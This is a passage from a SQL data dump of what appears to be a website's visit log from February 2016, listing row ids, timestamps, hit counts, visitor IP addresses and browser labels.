6,6,0,0,'141.8.184.18','other'),(4763,1455795403,1,1,0,0,'91.196.178.98','chrome'),(4764,1455795659,1,1,0,0,'40.77.167.6','other'),(4765,1455795836,6,6,0,0,'141.8.183.14','other'),(4766,1455795874,6,6,0,0,'178.154.149.11','other'),(4767,1455796052,4,4,0,0,'93.158.152.9','other'),(4768,1455796130,5,5,0,0,'5.255.253.53','other'),(4769,1455796139,7,7,0,0,'141.8.132.99','other'),(4770,1455796152,3,3,0,0,'141.8.132.76','other'),(4771,1455796157,2,2,0,0,'130.193.51.43','other'),(4772,1455796162,2,2,0,0,'141.8.184.11','other'),(4773,1455796165,1,1,0,0,'5.255.253.9','other'),(4774,1455796174,1,1,0,0,'141.8.142.41','other'),(4775,1455796190,1,1,0,0,'5.255.253.110','other'),(4776,1455796213,1,1,0,0,'141.8.132.97','other'),(4777,1455796233,4,4,0,0,'130.193.37.21','other'),(4778,1455796262,5,5,0,0,'141.8.184.18','other'),(4779,1455796290,2,2,0,0,'130.193.51.45','other'),(4780,1455796483,1,1,0,0,'5.255.253.100','other'),(4781,1455796504,1,1,0,0,'66.249.93.86','other'),(4782,1455796615,1,1,0,0,'217.69.136.204','other'),(4783,1455797057,1,1,0,0,'213.133.178.101','chrome'),(4784,1455797213,1,1,0,0,'37.54.17.137','chrome'),(4785,1455797462,1,1,0,0,'8.29.198.26','other'),(4786,1455797747,1,1,0,0,'93.158.152.9','other'),(4787,1455798217,1,1,0,0,'141.8.184.18','other'),(4788,1455798219,1,1,0,0,'62.210.215.100','chrome'),(4789,1455798224,1,1,0,0,'91.196.178.135','firefox'),(4790,1455798912,1,1,0,0,'157.55.39.44','other'),(4791,1455799277,1,1,0,0,'91.196.178.72','firefox'),(4792,1455799340,1,1,0,0,'207.46.13.15','other'),(4793,1455799378,1,1,0,0,'180.76.15.144','other'),(4794,1455799384,1,1,0,0,'141.8.183.14','other'),(4795,1455799433,3,3,0,0,'188.166.6.228','other'),(4796,1455799494,1,0,1,0,'66.249.66.150',''),(4797,1455799571,1,1,0,0,'62.210.215.100','chrome'),(4798,1455799811,2,0,2,0,'66.249.66.158',''),(4799,1455800166,1,1,0,0,'66.249.93.90','other'),(4800,1455800168,1,1,0,0,'141.8.184.18','other'),(4801,1455800395,2,2,0,0,'188.166.6.228','other'),(4802,1455800949,1,1,0,0,'157.55.39.44','other'),(4803,1455801062,1,1,0,0,'93.75.2.233','firefox'),(4804,1455801224,4,4,0,0,'141.8.184.18','other'),(4805,1455801231,6,6,0,0,'141.8.183.14','other'),(4806,1455801281,1,1,0,0,'51.255.65.41','other'),(4807,1455801283,4,4,0,0,'141.8.132.99','other'),(4808,1455801298,2,2,0,0,'5.255.253.100','other'),(4809,1455801472,2,0,2,0,'66.249.66.158',''),(4810,1455801522,4,4,0,0,'93.158.152.9','other'),(4811,1455801604,2,2,0,0,'5.255.253.53','other'),(4812,1455801606,2,2,0,0,'130.193.51.45','other'),(4813,1455801623,1,1,0,0,'130.193.51.55','other'),(4814,1455801639,3,3,0,0,'178.154.149.11','other'),(4815,1455801683,1,1,0,0,'130.193.37.21','other'),(4816,1455801703,1,1,0,0,'141.8.132.66','other'),(4817,1455801707,1,1,0,0,'141.8.184.11','other'),(4818,1455801725,1,1,0,0,'51.255.65.26','other'),(4819,1455801830,1,1,0,0,'91.196.178.71','firefox'),(4820,1455801843,1,1,0,0,'91.196.178.68','chrome'),(4821,1455801865,1,0,1,0,'66.249.66.154',''),(4822,1455803397,1,1,0,0,'180.76.15.31','other'),(4823,1455803682,1,1,0,0,'66.249.93.94','other'),(4824,1455803718,1,1,0,0,'94.231.188.10','firefox'),(4825,1455803958,1,1,0,0,'207.46.13.15','other'),(4826,1455804137,1,1,0,0,'37.53.89.22','chrome'),(4827,1455804258,1,0,1,0,'66.249.66.150',''),(4828,1455804276,1,1,0,0,'185.26.182.35','opera'),(4829,1455804618,1,0,1,0,'66.249.66.154',''),(4830,1455804738,5,5,0,0,'82.193.127.15','other'),(4831,1455805261,27,27,0,0,'80.91.162.99','other'),(4832,1455805321,1,1,0,0,'94.231.188.10','firefox'),(4833,1455805704,1,1,0,0,'217.69.133.251','other'),(4834,1455805705,1,1,0,0,'217.69.133.252','other'),(4835,1455805862,1,1,0,0,'157.55.39.44','other'),(4836,1455805961,1,1,0,0,'66.249.92.91','other'),(4837,1455806033,1,1,0,0,'207.46.13.15','other'),(4838,1455806544,1,1,0,0,'217.69.133.216','other'),(4839,1455806916,1,1,0,0,'93.158.152.9','other'),(4840,1455806920,1,1,0,0,'178.154.149.11','other'),(4841,1455807048,1,1,0,0,'94.231.188.10','firefox'),(4842,1455807430,3,0,3,0,'66.249.66.158',''),(4843,1455807971,1,0,1,0,'68.180.229.232',''),(4844,1455808081,1,1,0,0,'157.55.39.118','other'),(4845,1455808328,1,1,0,0,'8.29.198.25','other'),(4846,1455808331,1,1,0,0,'157.55.39.42','other'),(4847,1455809066,1,1,0,0,'51.255.65.5','other'),(4848,1455809221,1,0,1,0,'68.180.229.232',''),(4849,1455809360,1,1,0,0,'207.46.13.75','other'),(4850,1455809802,1,1,0,0,'157.55.39.42','other'),(4851,1455810440,1,1,0,0,'91.196.178.66','chrome'),(4852,1455810515,3,3,0,0,'178.154.149.11','other'),(4853,1455810517,1,1,0,0,'51.255.65.8','other'),(4854,1455810519,1,1,0,0,'141.8.183.14','other'),(4855,1455810523,3,3,0,0,'141.8.184.18','other'),(4856,1455810531,1,1,0,0,'93.158.152.9','other'),(4857,1455810581,2,2,0,0,'92.242.36.2','firefox'),(4858,1455810661,1,1,0,0,'178.151.143.163','other'),(4859,1455810903,1,0,1,0,'66.249.66.154',''),(4861,1455810992,1,1,0,0,'51.255.65.46','other'),(4862,1455811585,5,5,0,0,'80.91.162.99','other'),(4863,1455811953,1,1,0,0,'82.145.222.51','other'),(4864,1455812001,1,1,0,0,'62.210.215.100','chrome'),(4865,1455812249,2,0,2,0,'66.249.66.150',''),(4866,1455812366,2,0,2,0,'66.249.66.158',''),(4867,1455812583,1,1,0,0,'180.76.15.5','other'),(4868,1455812776,1,1,0,0,'51.255.65.20','other'),(4869,1455813246,5,5,0,0,'141.8.184.18','other'),(4870,1455813341,1,0,1,0,'66.249.69.3',''),(4871,1455813623,1,0,1,0,'66.249.69.124',''),(4872,1455814245,1,1,0,0,'62.210.215.100','chrome'),(4873,1455814605,1,1,0,0,'217.69.133.11','other'),(4874,1455814893,1,1,0,0,'51.255.65.86','other'),(4875,1455815128,1,1,0,0,'178.154.149.11','other'),(4876,1455815131,1,1,0,0,'93.158.152.9','other'),(4877,1455815483,1,0,1,0,'66.249.75.85',''),(4878,1455815538,1,1,0,0,'51.255.65.36','other'),(4879,1455815620,1,0,1,0,'66.249.69.3',''),(4880,1455816347,2,0,2,0,'68.180.229.232',''),(4881,1455816366,1,1,0,0,'207.46.13.75','other'),(4882,1455816602,1,1,0,0,'180.76.15.156','other'),(4883,1455817110,1,1,0,0,'51.255.65.58','other'),(4884,1455817210,1,1,0,0,'66.249.91.8','other'),(4885,1455817265,2,2,0,0,'136.243.103.92','other'),(4886,1455817853,1,1,0,0,'141.8.183.14','other'),(4887,1455817857,1,1,0,0,'93.158.152.9','other'),(4888,1455817874,1,0,1,0,'66.249.69.3',''),(4889,1455818024,1,1,0,0,'94.244.46.42','chrome'),(4890,1455818249,1,0,1,0,'66.249.69.11',''),(4891,1455819108,1,0,1,0,'66.249.69.124',''),(4892,1455819227,1,1,0,0,'8.29.198.26','other'),(4893,1455819335,1,0,1,0,'68.180.229.232',''),(4894,1455819730,1,1,0,0,'130.193.37.21','other'),(4895,1455819733,1,1,0,0,'141.8.132.99','other'),(4896,1455820361,1,0,1,0,'68.180.229.232',''),(4897,1455820662,1,1,0,0,'157.55.39.118','other'),(4898,1455820931,1,1,0,0,'92.113.127.190','firefox'),(4899,1455820943,1,1,0,0,'109.87.138.56','other'),(4900,1455821282,1,1,0,0,'104.131.147.112','other'),(4901,1455821403,2,2,0,0,'92.242.36.2','firefox'),(4902,1455821515,1,1,0,0,'62.210.215.100','chrome'),(4903,1455821698,1,1,0,0,'77.120.184.75','firefox'),(4904,1455821896,1,1,0,0,'66.249.93.94','other'),(4905,1455821933,1,0,1,0,'66.249.69.3',''),(4906,1455822046,2,0,2,0,'66.249.69.11',''),(4907,1455822139,1,1,0,0,'141.8.183.14','other'),(4908,1455822143,1,1,0,0,'130.193.37.21','other'),(4909,1455823065,1,1,0,0,'92.113.255.198','chrome'),(4910,1455823205,1,1,0,0,'217.69.133.10','other'),(4911,1455823354,2,2,0,0,'157.55.39.118','other'),(4912,1455823908,1,0,1,0,'66.249.69.124',''),(4913,1455823975,1,0,1,0,'66.249.75.77',''),(4914,1455824020,2,0,2,0,'66.249.69.11',''),(4915,1455824540,50,50,0,0,'80.91.162.99','other'),(4916,1455825246,2,0,2,0,'66.249.69.11',''),(4917,1455825274,1,1,0,0,'130.193.51.45','other'),(4918,1455825278,1,1,0,0,'141.8.184.18','other'),(4919,1455825518,1,1,0,0,'157.55.39.42','other'),(4920,1455825637,1,1,0,0,'66.249.93.94','other'),(4921,1455825952,1,0,1,0,'66.249.69.124',''),(4922,1455826213,1,1,0,0,'51.255.65.29','other'),(4923,1455826425,1,0,1,0,'66.249.69.11',''),(4924,1455826976,2,0,2,0,'66.249.69.124',''),(4925,1455827110,297,297,0,0,'62.212.73.211','other'),(4926,1455827573,2,0,2,0,'68.180.229.232',''),(4927,1455827650,1,0,1,0,'66.249.69.11',''),(4928,1455827841,107,107,0,0,'82.193.127.15','other'),(4929,1455828011,3,3,0,0,'62.212.73.211','other'),(4930,1455828184,1,1,0,0,'180.76.15.18','other'),(4931,1455828220,1,1,0,0,'180.76.15.7','other'),(4932,1455828427,1,1,0,0,'5.255.253.30','other'),(4933,1455828431,1,1,0,0,'141.8.142.41','other'),(4934,1455828511,1,1,0,0,'66.249.91.8','other'),(4935,1455828561,1,1,0,0,'157.55.39.42','other'),(4936,1455828791,1,0,1,0,'68.180.229.232',''),(4937,1455829007,1,0,1,0,'66.249.69.3',''),(4938,1455829521,1,1,0,0,'157.55.39.118','other'),(4939,1455829639,1,1,0,0,'217.69.133.245','other'),(4940,1455829640,1,1,0,0,'217.69.133.244','other'),(4941,1455830153,1,1,0,0,'8.29.198.25','other'),(4942,1455830755,1,1,0,0,'5.255.253.53','other'),(4943,1455830758,1,1,0,0,'5.255.253.100','other'),(4944,1455830762,1,1,0,0,'93.158.152.9','other'),(4945,1455830766,1,1,0,0,'130.193.51.81','other'),(4946,1455831353,1,1,0,0,'82.145.220.54','chrome'),(4947,1455831608,1,1,0,0,'51.255.65.70','other'),(4948,1455831796,1,1,0,0,'62.210.215.100','chrome'),(4949,1455832153,2,2,0,0,'92.242.36.2','firefox'),(4950,1455832448,1,1,0,0,'51.255.65.75','other'),(4951,1455832787,1,1,0,0,'66.249.93.94','other'),(4952,1455833019,1,1,0,0,'141.8.184.18','other'),(4953,1455833022,1,1,0,0,'178.154.149.11','other'),(4954,1455833026,1,1,0,0,'141.8.132.99','other'),(4955,1455833030,1,1,0,0,'130.193.51.102','other'),(4956,1455833066,1,0,1,0,'66.249.69.3',''),(4957,1455834120,2,0,2,0,'68.180.229.232',''),(4958,1455834343,1,1,0,0,'217.69.133.249','other'),(4959,1455834402,1,1,0,0,'217.69.133.234','other'),(4960,1455834706,1,1,0,0,'91.196.178.37','chrome'),(4961,1455835249,1,1,0,0,'180.76.15.141','other'),(4962,1455835395,1,0,1,0,'68.180.229.232',''),(4963,1455835496,1,0,1,0,'66.249.69.11',''),(4964,1455835651,1,1,0,0,'5.255.253.62','other'),(4965,1455835697,1,0,1,0,'66.249.69.3',''),(4966,1455835707,1,0,1,0,'66.249.69.124',''),(4967,1455835882,1,1,0,0,'51.255.65.66','other'),(4968,1455836189,1,1,0,0,'51.255.65.29','other'),(4969,1455836355,1,1,0,0,'157.55.39.42','other'),(4970,1455836482,1,1,0,0,'66.249.81.205','other'),(4971,1455837007,1,1,0,0,'207.46.13.31','other'),(4972,1455837016,1,1,0,0,'157.55.39.118','other'),(4973,1455838259,1,0,1,0,'68.180.229.232',''),(4974,1455838531,1,1,0,0,'141.8.132.2','other'),(4975,1455838534,2,2,0,0,'141.8.183.14','other'),(4976,1455838541,1,1,0,0,'141.8.184.18','other'),(4977,1455839171,1,0,1,0,'68.180.229.232',''),(4978,1455839574,1,1,0,0,'217.69.133.18','other'),(4979,1455839633,1,1,0,0,'66.249.91.4','other'),(4980,1455840240,1,1,0,0,'51.255.65.41','other'),(4981,1455840281,1,0,1,0,'66.249.78.151',''),(4982,1455840315,1,1,0,0,'177.75.16.71','other'),(4983,1455840809,1,1,0,0,'51.255.65.52','other'),(4984,1455840871,2,2,0,0,'92.242.36.2','firefox'),(4985,1455840936,1,1,0,0,'217.69.133.244','other'),(4986,1455841001,1,1,0,0,'8.29.198.26','other'),(4987,1455841080,1,0,1,0,'68.180.229.232',''),(4988,1455841095,4,4,0,0,'141.8.184.18','other'),(4989,1455841394,1,1,0,0,'51.255.65.4','other'),(4990,1455841737,9,9,0,0,'82.193.127.15','other'),(4991,1455842498,1,1,0,0,'51.255.65.45','other'),(4992,1455842560,1,1,0,0,'62.210.215.100','chrome'),(4993,1455842656,1,1,0,0,'157.55.39.42','other'),(4994,1455842925,1,1,0,0,'5.255.253.100','other'),(4995,1455842927,1,1,0,0,'130.193.51.43','other'),(4996,1455842932,1,1,0,0,'5.255.253.10','other'),(4997,1455842934,1,1,0,0,'141.8.132.97','other'),(4998,1455843568,1,0,1,0,'66.249.78.144',''),(4999,1455844671,1,0,1,0,'66.249.69.3',''),(5000,1455845199,2,2,0,0,'178.154.149.11','other'),(5001,1455845202,1,1,0,0,'141.8.184.18','other'),(5002,1455845209,1,1,0,0,'93.158.152.9','other'),(5003,1455845580,1,0,1,0,'66.249.78.144',''),(5004,1455845649,1,1,0,0,'40.77.167.6','other'),(5005,1455846907,1,0,1,0,'68.180.229.232',''),(5006,1455847985,1,1,0,0,'141.8.183.14','other'),(5007,1455847988,3,3,0,0,'141.8.184.18','other'),(5008,1455848001,1,1,0,0,'217.69.133.251','other'),(5009,1455849618,77,77,0,0,'82.193.127.15','other'),(5010,1455849643,1,1,0,0,'89.67.240.30','firefox'),(5011,1455849648,1,0,1,0,'66.249.78.151',''),(5012,1455849823,2,2,0,0,'92.242.36.2','firefox'),(5013,1455849921,2,0,2,0,'68.180.229.232',''),(5014,1455850444,1,1,0,0,'217.69.133.2','other'),(5015,1455850621,1,1,0,0,'66.249.91.4','other'),(5016,1455850997,1,0,1,0,'66.249.78.158',''),(5017,1455851115,1,1,0,0,'178.154.189.204','other'),(5018,1455851255,1,1,0,0,'37.9.122.201','other'),(5019,1455851476,1,1,0,0,'180.76.15.141','other'),(5020,1455851802,1,1,0,0,'62.210.215.100','chrome'),(5021,1455851820,1,1,0,0,'8.29.198.26','other'),(5022,1455852128,1,1,0,0,'51.255.65.33','other'),(5023,1455852279,1,0,1,0,'68.180.229.232',''),(5024,1455852784,1,1,0,0,'51.255.65.21','other'),(5025,1455853138,50,50,0,0,'80.91.162.99','other'),(5026,1455853144,1,0,1,0,'66.249.78.151',''),(5027,1455853269,2,2,0,0,'178.154.149.11','other'),(5028,1455853273,1,1,0,0,'141.8.183.14','other'),(5029,1455853275,1,1,0,0,'141.8.184.18','other'),(5030,1455853446,1,1,0,0,'157.55.39.44','other'),(5031,1455853975,1,1,0,0,'51.255.65.49','other'),(5032,1455854710,1,1,0,0,'217.69.133.225','other'),(5033,1455854713,1,0,1,0,'66.249.78.151',''),(5034,1455854781,1,1,0,0,'157.55.39.44','other'),(5035,1455855137,46,46,0,0,'82.193.127.15','other'),(5036,1455855300,1,1,0,0,'5.79.255.105','chrome'),(5037,1455855351,1,1,0,0,'85.214.11.209','chrome'),(5038,1455856130,1,1,0,0,'157.55.39.42','other'),(5039,1455856265,22,22,0,0,'62.212.73.211','other'),(5040,1455856514,1,1,0,0,'5.255.253.110','other'),(5041,1455856517,1,1,0,0,'130.193.51.50','other'),(5042,1455856520,1,1,0,0,'141.8.183.14','other'),(5043,1455856523,1,1,0,0,'93.158.152.9','other'),(5044,1455857073,1,1,0,0,'157.55.39.42','other'),(5045,1455857268,1,0,1,0,'66.249.78.144',''),(5046,1455858091,1,1,0,0,'157.55.39.44','other'),(5047,1455858807,1,0,1,0,'68.180.229.232',''),(5048,1455858886,1,1,0,0,'217.69.133.190','other'),(5049,1455858930,1,1,0,0,'157.55.39.42','other'),(5050,1455859268,1,1,0,0,'94.179.15.195','firefox'),(5051,1455859918,1,1,0,0,'157.55.39.118','other'),(5052,1455860019,2,2,0,0,'92.242.36.2','firefox'),(5053,1455860825,1,1,0,0,'180.76.15.151','other'),(5054,1455861404,1,1,0,0,'178.154.149.11','other'),(5055,1455861407,1,1,0,0,'130.193.51.102','other'),(5056,1455861410,1,1,0,0,'130.193.37.27','other'),(5057,1455861413,1,1,0,0,'141.8.184.18','other'),(5058,1455861666,1,1,0,0,'66.249.81.205','other'),(5059,1455861970,1,1,0,0,'66.249.91.4','other'),(5060,1455862000,1,1,0,0,'157.55.39.118','other'),(5061,1455862246,1,0,1,0,'66.249.78.144',''),(5062,1455862641,1,1,0,0,'8.29.198.26','other'),(5063,1455863466,1,1,0,0,'40.77.167.6','other'),(5064,1455863514,1,0,1,0,'66.249.78.144',''),(5065,1455863748,1,1,0,0,'91.196.178.71','chrome'),(5066,1455863980,1,1,0,0,'62.210.215.100','chrome'),(5067,1455864037,1,0,1,0,'66.249.78.158',''),(5068,1455864392,1,1,0,0,'91.196.178.167','chrome'),(5069,1455865301,1,1,0,0,'66.249.81.211','other'),(5070,1455865601,1,1,0,0,'180.76.15.20','other'),(5071,1455865764,1,0,1,0,'68.180.229.232',''),(5072,1455865828,4,4,0,0,'141.8.184.18','other'),(5073,1455866489,1,0,1,0,'66.249.78.144',''),(5074,1455866673,1,0,1,0,'66.249.78.158',''),(5075,1455867271,1,1,0,0,'94.22.47.242','other'),(5076,1455867319,1,0,1,0,'66.249.78.151',''),(5077,1455867330,1,1,0,0,'91.196.178.71','firefox'),(5078,1455867387,1,1,0,0,'207.46.13.10','other'),(5079,1455867521,4,4,0,0,'80.91.162.99','other'),(5080,1455867535,1,1,0,0,'66.249.93.90','firefox'),(5081,1455867539,1,1,0,0,'91.196.178.71','chrome'),(5082,1455867743,2,2,0,0,'91.196.178.72','firefox'),(5083,1455867792,1,1,0,0,'91.196.177.90','chrome'),(5084,1455867890,1,1,0,0,'40.77.167.6','other'),(5085,1455868535,1,1,0,0,'141.8.184.18','other'),(5086,1455868537,1,1,0,0,'178.154.149.11','other'),(5087,1455868540,1,1,0,0,'130.193.51.102','other'),(5088,1455868543,1,1,0,0,'130.193.51.85','other'),(5089,1455868586,1,0,1,0,'68.180.229.232',''),(5090,1455868696,1,1,0,0,'51.255.65.21','other'),(5091,1455868993,2,2,0,0,'91.196.178.72','firefox'),(5092,1455869160,1,1,0,0,'37.55.170.244','chrome'),(5093,1455869360,3,3,0,0,'91.121.169.194','other'),(5094,1455869700,1,0,1,0,'68.180.229.232',''),(5095,1455869822,1,1,0,0,'207.46.13.10','other'),(5096,1455869845,1,0,1,0,'66.249.69.3',''),(5097,1455869947,1,1,0,0,'66.249.93.94','firefox'),(5098,1455870175,4,4,0,0,'69.30.198.186','other'),(5099,1455870267,5,5,0,0,'144.76.7.107','other'),(5100,1455870348,1,1,0,0,'157.55.39.44','other'),(5101,1455870457,1,1,0,0,'91.196.178.131','firefox'),(5103,1455870547,1,1,0,0,'178.154.149.11','other'),(5104,1455870550,3,3,0,0,'93.158.152.9','other'),(5105,1455870767,3,3,0,0,'82.193.127.15','other'),(5106,1455870802,4,4,0,0,'184.19.84.107','other'),(5107,1455871485,81,81,0,0,'157.55.39.44','other'),(5108,1455871927,1,1,0,0,'91.233.49.241','chrome'),(5109,1455871985,2,2,0,0,'69.30.213.18','other'),(5110,1455872037,1,1,0,0,'37.54.90.213','chrome'),(5111,1455872047,70,70,0,0,'207.46.13.10','other'),(5112,1455872137,71,71,0,0,'40.77.167.6','other'),(5113,1455872218,62,62,0,0,'157.55.39.118','other'),(5114,1455872239,1,1,0,0,'95.134.116.124','chrome'),(5115,1455872558,1,1,0,0,'141.8.184.18','other'),(5116,1455872561,2,2,0,0,'178.154.149.11','other'),(5117,1455872566,1,1,0,0,'141.8.183.14','other'),(5118,1455872571,1,0,1,0,'66.249.69.3',''),(5119,1455872616,1,1,0,0,'66.249.81.205','other'),(5120,1455872894,1,0,1,0,'66.249.78.144',''),(5121,1455872948,1,1,0,0,'37.53.90.175','firefox'),(5122,1455873100,1,1,0,0,'66.249.91.63','other'),(5123,1455873300,2,2,0,0,'95.134.116.124','chrome'),(5124,1455873447,1,1,0,0,'8.29.198.26','other'),(5125,1455873543,1,0,1,0,'68.180.229.232',''),(5126,1455873560,1,0,1,0,'66.249.75.77',''),(5127,1455874023,1,1,0,0,'91.204.213.42','firefox'),(5128,1455874045,1,1,0,0,'77.222.142.148','msie'),(5129,1455874068,1,1,0,0,'37.53.90.175','firefox'),(5130,1455874238,1,0,1,0,'66.249.78.144',''),(5131,1455874488,2,2,0,0,'178.154.189.204','other'),(5132,1455874669,2,2,0,0,'151.80.41.169','other'),(5133,1455874697,1,1,0,0,'141.8.184.22','other'),(5134,1455874700,1,1,0,0,'141.8.132.79','other'),(5135,1455874702,1,1,0,0,'5.255.253.51','other'),(5136,1455874838,1,1,0,0,'91.196.178.71','chrome'),(5137,1455875102,2,2,0,0,'141.8.132.97','other'),(5138,1455875105,1,1,0,0,'141.8.142.8','other'),(5139,1455875108,2,2,0,0,'130.193.51.45','other'),(5140,1455875111,1,1,0,0,'5.255.253.110','other'),(5141,1455875114,2,2,0,0,'130.193.51.91','other'),(5142,1455875116,1,1,0,0,'130.193.51.43','other'),(5143,1455875119,1,1,0,0,'5.255.253.30','other'),(5144,1455875125,2,2,0,0,'93.158.152.26','other'),(5145,1455875128,1,1,0,0,'5.255.253.55','other'),(5146,1455875131,1,1,0,0,'141.8.184.6','other'),(5147,1455875198,1,1,0,0,'207.46.13.10','other'),(5148,1455875235,1,0,1,0,'68.180.229.232',''),(5149,1455875344,1,1,0,0,'62.210.215.100','chrome'),(5150,1455875345,1,1,0,0,'67.196.55.3','chrome'),(5151,1455875433,15,15,0,0,'178.154.149.11','other'),(5152,1455875436,13,13,0,0,'141.8.184.18','other'),(5153,1455875438,18,18,0,0,'141.8.183.14','other'),(5154,1455875441,11,11,0,0,'5.255.253.53','other'),(5155,1455875462,8,8,0,0,'93.158.152.9','other'),(5156,1455875579,1,1,0,0,'130.193.37.21','other'),(5157,1455875653,1,1,0,0,'141.8.184.22','other'),(5158,1455875660,1,1,0,0,'141.8.142.10','other'),(5159,1455875677,1,1,0,0,'141.8.132.79','other'),(5160,1455875693,1,1,0,0,'141.8.142.41','other'),(5161,1455875701,1,1,0,0,'141.8.142.60','other'),(5162,1455875719,1,1,0,0,'91.196.178.16','chrome'),(5163,1455875745,1,1,0,0,'91.196.178.71','firefox'),(5164,1455875934,1,1,0,0,'78.111.185.171','firefox'),(5165,1455875942,1,0,1,0,'66.249.69.124',''),(5166,1455875950,1,0,1,0,'66.249.78.144',''),(5167,1455876136,1,1,0,0,'66.249.81.211','other'),(5168,1455876226,1,0,1,0,'66.249.78.44',''),(5169,1455876235,1,1,0,0,'37.54.90.213','chrome'),(5170,1455876412,1,1,0,0,'37.52.161.158','chrome'),(5171,1455876587,1,0,1,0,'66.249.78.158',''),(5172,1455877751,3,3,0,0,'141.8.184.18','other'),(5173,1455877755,1,1,0,0,'93.158.152.9','other'),(5174,1455877884,1,0,1,0,'66.249.78.37',''),(5175,1455878208,1,1,0,0,'40.77.167.6','other'),(5176,1455878510,1,1,0,0,'157.55.39.118','other'),(5177,1455878835,1,1,0,0,'178.94.212.45','firefox'),(5178,1455878937,1,0,1,0,'66.249.78.151',''),(5179,1455879225,1,1,0,0,'207.46.13.10','other'),(5180,1455879356,1,1,0,0,'5.255.253.53','other'),(5181,1455879431,1,1,0,0,'91.192.44.112','chrome'),(5182,1455879686,1,1,0,0,'66.249.81.205','other'),(5183,1455879687,1,0,1,0,'68.180.229.232',''),(5184,1455879747,6,6,0,0,'141.8.184.18','other'),(5185,1455879750,4,4,0,0,'178.154.149.11','other'),(5186,1455879759,2,2,0,0,'141.8.183.14','other'),(5187,1455879780,1,1,0,0,'93.158.152.9','other'),(5188,1455879872,1,0,1,0,'66.249.78.151',''),(5189,1455880478,1,1,0,0,'91.196.178.71','firefox'),(5190,1455880716,1,1,0,0,'176.113.164.79','firefox'),(5191,1455880925,1,1,0,0,'78.111.187.21','chrome'),(5192,1455881103,1,1,0,0,'216.163.188.232','firefox'),(5193,1455881530,1,0,1,0,'68.180.229.232',''),(5194,1455881725,106,106,0,0,'136.243.36.97','other'),(5195,1455882105,1,1,0,0,'37.53.90.175','firefox'),(5196,1455882108,1,1,0,0,'37.54.90.213','chrome'),(5197,1455882626,56,56,0,0,'136.243.36.97','other'),(5198,1455882856,2,2,0,0,'178.154.149.11','other'),(5199,1455882870,1,1,0,0,'195.154.187.115','other'),(5200,1455882961,1,0,1,0,'66.249.78.151',''),(5201,1455882981,1,0,1,0,'66.249.78.144',''),(5202,1455883261,1,0,1,0,'66.249.78.44',''),(5203,1455883395,1,1,0,0,'66.249.81.208','other'),(5204,1455883694,2,2,0,0,'80.91.162.99','other'),(5205,1455883894,1,1,0,0,'51.255.65.24','other'),(5206,1455884085,1,1,0,0,'91.196.178.16','opera'),(5207,1455884115,1,1,0,0,'91.204.213.94','chrome'),(5208,1455884250,1,1,0,0,'66.249.91.63','other'),(5209,1455884260,1,1,0,0,'8.29.198.26','other'),(5210,1455884405,2,0,2,0,'66.249.78.144',''),(5211,1455884516,1,1,0,0,'130.193.51.102','other'),(5212,1455884518,1,1,0,0,'141.8.132.44','other'),(5213,1455884521,1,1,0,0,'141.8.183.14','other'),(5214,1455884524,1,1,0,0,'178.154.149.11','other'),(5215,1455885138,1,0,1,0,'66.249.78.151',''),(5216,1455885246,3,0,3,0,'68.180.229.232',''),(5217,1455885461,1,0,1,0,'66.249.78.30',''),(5218,1455885467,1,1,0,0,'62.210.215.100','chrome'),(5219,1455885790,1,1,0,0,'193.108.50.222','chrome'),(5220,1455886089,1,0,1,0,'66.249.78.144',''),(5221,1455886111,1,0,1,0,'66.249.75.101',''),(5222,1455886307,1,1,0,0,'91.204.213.94','chrome'),(5223,1455886346,2,2,0,0,'82.193.127.15','other'),(5224,1455886409,1,1,0,0,'178.125.75.52','other'),(5225,1455886439,1,1,0,0,'93.85.201.51','firefox'),(5226,1455886647,1,0,1,0,'66.249.78.158',''),(5227,1455886674,1,1,0,0,'141.8.184.18','other'),(5228,1455886677,1,1,0,0,'178.154.149.11','other'),(5229,1455886680,2,2,0,0,'141.8.183.14','other'),(5230,1455886795,1,1,0,0,'217.69.133.4','other'),(5231,1455887166,1,1,0,0,'66.249.81.205','other'),(5232,1455887186,1,1,0,0,'207.46.13.10','other'),(5233,1455887212,2,0,2,0,'68.180.229.232',''),(5234,1455887410,1,1,0,0,'91.196.178.68','firefox'),(5235,1455887507,2,2,0,0,'46.211.155.50','chrome'),(5236,1455887606,1,1,0,0,'66.102.9.104','firefox'),(5237,1455887757,1,1,0,0,'217.69.133.15','other'),(5238,1455887860,1,1,0,0,'217.69.133.221','other'),(5239,1455887968,1,1,0,0,'95.133.12.184','chrome'),(5240,1455888079,1,1,0,0,'91.192.131.224','firefox'),(5241,1455888256,1,0,1,0,'66.249.78.151',''),(5242,1455888457,1,1,0,0,'82.207.49.94','chrome'),(5243,1455888498,1,0,1,0,'66.249.69.11',''),(5244,1455888560,1,1,0,0,'207.46.13.10','other'),(5245,1455888897,1,1,0,0,'51.255.65.86','other'),(5246,1455889146,1,0,1,0,'66.249.78.44',''),(5247,1455889247,1,1,0,0,'91.196.178.130','firefox'),(5248,1455889273,1,1,0,0,'157.55.39.44','other'),(5249,1455889455,1,1,0,0,'37.53.89.22','chrome'),(5250,1455889554,1,1,0,0,'5.255.253.9','other'),(5251,1455889555,1,1,0,0,'141.8.132.79','other'),(5252,1455889556,2,2,0,0,'5.255.253.62','other'),(5253,1455889557,1,1,0,0,'141.8.184.31','other'),(5255,1455889580,2,0,2,0,'68.180.229.232',''),(5256,1455889706,1,1,0,0,'207.46.13.10','other'),(5257,1455890245,1,0,1,0,'66.249.78.144',''),(5258,1455890541,1,1,0,0,'66.249.81.208','other'),(5259,1455890785,1,1,0,0,'157.55.39.118','other'),(5260,1455890968,1,1,0,0,'91.204.213.94','chrome'),(5261,1455891030,1,1,0,0,'91.196.178.72','firefox'),(5262,1455891573,1,1,0,0,'85.115.62.180','other'),(5263,1455891614,1,0,1,0,'66.249.78.151',''),(5264,1455891757,1,1,0,0,'157.55.39.44','other'),(5265,1455891843,1,1,0,0,'141.8.184.18','other'),(5266,1455891844,1,1,0,0,'178.154.149.11','other'),(5267,1455891858,1,0,1,0,'66.249.78.144',''),(5268,1455893304,5,5,0,0,'89.163.148.58','other'),(5269,1455893751,1,0,1,0,'66.249.78.144',''),(5270,1455894138,1,1,0,0,'66.249.81.205','other'),(5271,1455894419,1,1,0,0,'141.0.13.194','other'),(5272,1455894922,1,1,0,0,'66.249.91.4','other'),(5273,1455894962,1,1,0,0,'157.55.39.2','other'),(5274,1455895082,1,1,0,0,'8.29.198.26','other'),(5275,1455895780,1,1,0,0,'207.46.13.10','other'),(5276,1455895938,1,1,0,0,'157.55.39.118','other'),(5277,1455896086,1,1,0,0,'91.196.178.40','chrome'),(5278,1455896586,1,1,0,0,'82.145.220.103','chrome'),(5279,1455896791,1,0,1,0,'66.249.7